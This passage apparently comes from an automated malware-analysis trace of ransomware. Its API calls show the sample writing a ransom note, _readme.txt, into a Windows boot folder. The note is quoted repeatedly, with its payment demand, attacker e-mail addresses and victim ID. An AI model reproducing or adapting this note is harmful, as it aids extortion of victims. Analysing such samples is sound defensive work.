hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.909] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0127.909] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0127.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x7516fe8 [0127.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0127.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0127.910] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0127.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0127.911] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.911] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0127.911] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0127.912] CloseHandle (hObject=0x5c4) returned 1 [0127.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0127.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0127.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0127.912] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.912] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.912] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0127.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.913] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.913] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0127.913] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3787dc0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.913] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3787dc0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.913] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.913] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.913] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.913] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.914] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.914] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.915] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.915] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.916] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.916] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.917] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.917] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.918] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.918] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.919] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.919] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 